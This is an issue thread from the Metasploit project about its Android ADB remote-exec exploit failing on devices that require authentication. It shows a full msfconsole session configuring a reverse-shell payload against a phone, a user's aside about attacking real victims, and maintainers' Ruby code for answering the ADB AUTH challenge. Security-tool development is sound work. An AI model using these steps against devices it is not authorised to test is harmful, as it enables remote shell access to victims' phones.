Metasploit-framework: ADB server not responding properly when the device requires authentication

Created on 26 Jan 2016 · 15Comments · Source: rapid7/metasploit-framework

Commit : d6facbe3393ac4a5c9ffc95ffbf75d69c31f4b2e
Pull : #6421

While using recent exploit/android/adb/adb_server_exec.rbmy mfsconsole reads garbage data and stops working further.

root@kali:~# msfconsole

  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.7--                            ]
+ -- --=[ 1519 exploits - 877 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/android/adb/adb_server_exec
msf exploit(adb_server_exec) > show options

Module options (exploit/android/adb/adb_server_exec):

   Name         Current Setting   Required  Description
   ----         ---------------   --------  -----------
   RHOST                          yes       The target address
   RPORT        5555              yes       The target port
   WritableDir  /data/local/tmp/  yes       Writable directory


Payload options (linux/armle/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   ARGV0  sh               no        argv[0] to pass to execve
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL  /system/bin/sh   yes       The shell to execute.


Exploit target:

   Id  Name
   --  ----
   0   armle


msf exploit(adb_server_exec) > set payload linux/armle/shell_reverse_tcp
payload => linux/armle/shell_reverse_tcp
msf exploit(adb_server_exec) > adb devices
[-] Unknown command: adb.
msf exploit(adb_server_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   armle
   1   x86
   2   x64
   3   mipsle


msf exploit(adb_server_exec) > set TARGET 0
TARGET => 0
msf exploit(adb_server_exec) > show options

Module options (exploit/android/adb/adb_server_exec):

   Name         Current Setting   Required  Description
   ----         ---------------   --------  -----------
   RHOST                          yes       The target address
   RPORT        5555              yes       The target port
   WritableDir  /data/local/tmp/  yes       Writable directory


Payload options (linux/armle/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   ARGV0  sh               no        argv[0] to pass to execve
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL  /system/bin/sh   yes       The shell to execute.


Exploit target:

   Id  Name
   --  ----
   0   armle


msf exploit(adb_server_exec) > set RHOST 192.168.1.116
RHOST => 192.168.1.116
msf exploit(adb_server_exec) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(adb_server_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.4:4444 
[*] Connecting to device...
[+] Connected to device:
���E��'�˷l{s�
                �'
^C[*] Exploit completed, but no session was created.
msf exploit(adb_server_exec) > Interrupt: use the 'exit' command to quit
msf exploit(adb_server_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.4:4444 
[*] Connecting to device...
[+] Connected to device:
����Q��gzҝ`j�sޡ�

After the Rubbish Data, i cant do any further attack as it gets stuck there.

I am using Kali Linux Rolling 2016.1
Android Device: Moto G (2nd Gen) X1550
Android 5.1.1

Any help would be appreciated

bug module

Source

Ashesh3

Most helpful comment

@Ashesh3 networked ADB seems to be more common on android TV devices, that is what I tested on. Unfortunately I don't have a spare 5.0 device that I want to install apps on. From the protocol readme, something like this should work (replace the existing connect method in lib/rex/proto/adb/client.rb):

  def connect
    response = ADB::Message::Connect.new.send_recv(@sock)
    if response.is_a? ADB::Message::Auth
      key = OpenSSL::PKey::RSA.new 2048
      signature = key.sign(OpenSSL::Digest::SHA1.new, response.data)
      sig_packet = ADB::Message::Auth.new(ADB::Message::Auth::TYPE_SIGNATURE, signature)
      sig_packet.send_recv(@sock)
    else
      response
    end
  end

If the key fails you will get back the garbage Auth packet again.

joevennix on 2 Feb 2016

👍2

All 15 comments

Did you try reset?

wvu-r7 on 27 Jan 2016

If you change the line modules/exploits/android/adb/adb_server_exec.rb:56 to:

print_good "Connected to device:\n#{device_data.inspect} #{device_data.to_s}"

It should print out some more enlightening data about the received packet.

joevennix on 27 Jan 2016

@waffleio-r7 Thanks but that doesn't work

@joevennix I have made the suggested changes and this is what i get now,

msf exploit(adb_server_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.4:433 
[*] Connecting to device...
[+] Connected to device:
#<Rex::Proto::ADB::Message::Auth:0x00000005a1a540 @command="AUTH", @arg0=1, @arg1=0, @data="\xA8w (\x1F\x14\x05r\xB8\x0E\xD7(I\x0E)\x7F\x94\x87\xC5]"> command=AUTH
arg0=0x1
arg1=0x0
data=�w (r��(I)���]

Any Ideas?

Edit:

Just a side question, will this require end user confirmation to allow me to connect?

Ashesh3 on 27 Jan 2016

@Ashesh3, thanks for the info, this is very helpful. Looks like there is an RSA-based authentication protocol that I never ran into when testing locally. Whoops. It looks very easy to implement, so I'll poke around at a device and try to finish it.

From the sound of it, if auth is enabled then unless you possess an already-accepted RSA key, the user must confirm the new connection.

joevennix on 27 Jan 2016

@joevennix Thanks for the information. I'll keep an eye out!

Ashesh3 on 27 Jan 2016

Any updates?

Ashesh3 on 29 Jan 2016

To fix it requires implementing the authentication protocol that your device likely is requesting. I'll update the title to reflect that.

bcook-r7 on 29 Jan 2016

@Ashesh3 can you explain a bit more on how you set up the device? What steps did you take to enable remote debugging?

joevennix on 1 Feb 2016

@joevennix As per my experience, most of the latest device won't have a wifi adb option in developer tools by default.

This problem can be solved by using third party apps which enable this functionality, with or without having root privileges.

Basically I installed a third party app from Play store named "Adb WiFi" and got the initial result as mentioned by me earlier, the result is same with different apps and different devices.

I currently don't own a developer Android release, just stock rom and in real world circumstances, an attacker would rarely like to attck victim using a developer keneral.

Ashesh3 on 1 Feb 2016

  def connect
    response = ADB::Message::Connect.new.send_recv(@sock)
    if response.is_a? ADB::Message::Auth
      key = OpenSSL::PKey::RSA.new 2048
      signature = key.sign(OpenSSL::Digest::SHA1.new, response.data)
      sig_packet = ADB::Message::Auth.new(ADB::Message::Auth::TYPE_SIGNATURE, signature)
      sig_packet.send_recv(@sock)
    else
      response
    end
  end

If the key fails you will get back the garbage Auth packet again.

joevennix on 2 Feb 2016

👍2

Any Update??